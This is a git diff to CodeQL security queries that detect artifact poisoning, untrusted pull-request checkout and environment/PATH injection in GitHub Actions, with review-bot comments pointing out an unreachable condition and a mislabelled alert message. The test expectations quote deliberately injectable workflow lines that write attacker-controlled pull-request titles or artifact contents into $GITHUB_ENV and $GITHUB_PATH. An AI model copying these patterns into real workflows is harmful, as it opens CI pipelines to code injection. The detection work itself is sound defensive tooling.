@@ -17,6 +17,8 @@ import codeql.actions.security.PoisonableSteps from ControlCheck check, MutableRefCheckoutStep checkout where + // the job can be triggered by an external user + check.getEnclosingJob().isExternallyTriggerable() and // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // there are no evidences that the checked-out code can lead to arbitrary code execution diff --git a/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql similarity index 64% rename from ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql rename to ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql index 379babf35f8..a7d2518564d 100644 --- a/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql @@ -3,9 +3,9 @@ * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps. * @kind path-problem * @problem.severity error - * @precision high + * @precision very-high * @security-severity 9 - * @id actions/privileged-artifact-poisoning + * @id actions/artifact-poisoning/critical * @tags actions * security * external/cwe/cwe-829 @@ -18,10 +18,11 @@ import ArtifactPoisoningFlow::PathGraph from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink where ArtifactPoisoningFlow::flowPath(source, sink) and - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - j.isPrivileged() + ( + inPrivilegedCompositeAction(sink.getNode().asExpr()) + or + inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) ) select sink.getNode(), source, sink, - "Potential privileged artifact poisoning in $@, which may be controlled by an external user.", - sink, sink.getNode().toString() + "Potential artifact poisoning in $@, which may be controlled by an external user.", sink, + sink.getNode().toString() 
diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql
similarity index 77%
rename from ql/src/Security/CWE-829/ArtifactPoisoning.ql
rename to ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql
index c26862960d1..a4fb958b7f9 100644
--- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql
+++ b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql
@@ -5,7 +5,7 @@
 * @problem.severity warning
 * @precision high
 * @security-severity 5.0
- * @id actions/artifact-poisoning
+ * @id actions/artifact-poisoning/medium
 * @tags actions
 * security
 * external/cwe/cwe-829
@@ -19,12 +19,8 @@ from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sin
 where
 ArtifactPoisoningFlow::flowPath(source, sink) and
 (
- exists(sink.getNode().asExpr().getEnclosingCompositeAction())
- or
- exists(Job j |
- j = sink.getNode().asExpr().getEnclosingJob() and
- not j.isPrivileged()
- )
+ inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or
+ inNonPrivilegedJob(sink.getNode().asExpr())
 )
 select sink.getNode(), source, sink,
 "Potential artifact poisoning in $@, which may be controlled by an external user.", sink,
diff --git a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
similarity index 85%
rename from ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql
rename to ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
index 1181cd1e755..0a597ee3fa4 100644
--- a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
@@ -5,9 +5,9 @@
 * that is able to push to the base repository and to access secrets.
 * @kind problem
 * @problem.severity error
- * @precision high
+ * @precision very-high
 * @security-severity 9.3
- * @id actions/privileged-untrusted-checkout/critical
+ * @id actions/untrusted-checkout/critical
 * @tags actions
 * security
 * external/cwe/cwe-829
@@ -20,10 +20,14 @@ import codeql.actions.security.PoisonableSteps
 from LocalJob j, PRHeadCheckoutStep checkout
 where
 j = checkout.getEnclosingJob() and
- j.isPrivileged() and
 j.getAStep() = checkout and
 checkout.getAFollowingStep() instanceof PoisonableStep and
 not exists(ControlCheck check |
 checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check
+ ) and
+ (
+ inPrivilegedCompositeAction(checkout)
+ or
+ inPrivilegedExternallyTriggerableJob(checkout)
 )
 select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow."
diff --git a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql
similarity index 87%
rename from ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql
rename to ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql
index bf2cf129fbf..29a15accdf2 100644
--- a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql
@@ -7,7 +7,7 @@
 * @problem.severity warning
 * @precision medium
 * @security-severity 5.3
- * @id actions/privileged-untrusted-checkout/high
+ * @id actions/untrusted-checkout/high
 * @tags actions
 * security
 * external/cwe/cwe-829
@@ -20,10 +20,14 @@ import codeql.actions.security.PoisonableSteps
 from LocalJob j, PRHeadCheckoutStep checkout
 where
 j = checkout.getEnclosingJob() and
- j.isPrivileged() and
 j.getAStep() = checkout and
 not checkout.getAFollowingStep() instanceof PoisonableStep and
 not exists(ControlCheck check |
 checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check
+ ) and
+ (
+ inPrivilegedCompositeAction(checkout)
+ or
+ inPrivilegedExternallyTriggerableJob(checkout)
 )
 select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow."
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql
new file mode 100644
index 00000000000..aa62a88935b
--- /dev/null
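Review bot: The added `inPrivilegedCompositeAction(checkout)` disjunct in UntrustedCheckoutCritical.ql looks unreachable, because the unchanged context lines still declare `from LocalJob j` and require `j = checkout.getEnclosingJob()`, so a checkout step that lives in a composite action rather than a job presumably never satisfies the `where` clause. This depends on how `getEnclosingJob()` behaves for composite-action steps, which the diff does not show. If composite actions are meant to be covered, move the `LocalJob` binding inside the job disjunct (or drop `j` altogether, since `j.getAStep() = checkout` only restates the enclosing job) and leave the two context predicates to decide. UntrustedCheckoutHigh.ql and the new UntrustedCheckoutMedium.ql have the same shape.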
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -0,0 +1,31 @@ +/** + * @name Checkout of untrusted code in trusted context + * @description Priveleged workflows have read/write access to the base repository and access to secrets. + * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment + * that is able to push to the base repository and to access secrets. + * @kind problem + * @problem.severity warning + * @precision medium + * @security-severity 5.0 + * @id actions/untrusted-checkout/medium + * @tags actions + * security + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.PoisonableSteps + +from LocalJob j, PRHeadCheckoutStep checkout +where + j = checkout.getEnclosingJob() and + j.getAStep() = checkout and + not exists(ControlCheck check | + checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check + ) and + ( + inNonPrivilegedCompositeAction(checkout) or + inNonPrivilegedJob(checkout) + ) +select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 5f4218cacfe..bedd03e2239 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -1,5 +1,5 @@ import codeql.actions.Ast -import codeql.actions.Ast::Utils as Utils +import codeql.actions.Helper import codeql.actions.Cfg as Cfg import codeql.actions.DataFlow import codeql.Locations @@ -69,7 +69,7 @@ query string testNormalizeExpr(string s) { "github.event.pull_request.user['login']", "github.event.pull_request.user[\"login\"]", "github.event.pull_request['user']['login']", "foo['bar'] == baz" ] and - result = Utils::normalizeExpr(s) + result = normalizeExpr(s) } query predicate writeToGitHubEnv(string key, string value) { 
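Review bot: The `select` message in the new UntrustedCheckoutMedium.ql says "on privileged workflow", but its `where` clause only matches `inNonPrivilegedCompositeAction(checkout)` or `inNonPrivilegedJob(checkout)`, so every alert from this query describes the opposite context and will mislead triage. The `@description` is likewise copied from the privileged variants ("Priveleged workflows have read/write access to the base repository and access to secrets", also misspelled). Suggest `select checkout, "Potential unsafe checkout of untrusted pull request on non-privileged workflow."` and a description that matches the non-privileged case. The `codeql.actions.security.PoisonableSteps` import also appears unused here, since no `PoisonableStep` is referenced in this file.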
@@ -82,7 +82,7 @@ query predicate writeToGitHubEnv(string key, string value) { "echo 'sha2=$(> $GITHUB_ENV", "echo sha3=$(> $GITHUB_ENV", ] and - Utils::extractLineAssignment(t, "ENV", key, value) + extractLineAssignment(t, "ENV", key, value) ) } @@ -100,6 +100,6 @@ query predicate writeToGitHubOutput(string key, string value) { "echo sha5=$(> ${GITHUB_OUTPUT}", "echo sha6=$(> \"${GITHUB_OUTPUT}\"", ] and - Utils::extractLineAssignment(t, "OUTPUT", key, value) + extractLineAssignment(t, "OUTPUT", key, value) ) } diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref deleted file mode 100644 index ab36454942e..00000000000 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-077/EnvPathInjection.ql diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected similarity index 71% rename from ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected rename to ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected index af4b70d3a60..c6091f1fc23 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected 
@@ -18,8 +18,8 @@ nodes | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | subpaths #select -| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | -| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | -| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | -| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref new file mode 100644 index 00000000000..80f72124fe4 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvPathInjectionCritical.ql diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected rename to ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref new file mode 100644 index 00000000000..165a3d20896 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvPathInjectionMedium.ql 
diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref deleted file mode 100644 index dafc2b38fc4..00000000000 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-077/EnvVarInjection.ql diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected similarity index 71% rename from ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected rename to ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 8c9d923bd35..369085708a0 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected 
@@ -35,14 +35,14 @@ nodes | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths #select -| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | -| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | -| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | -| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
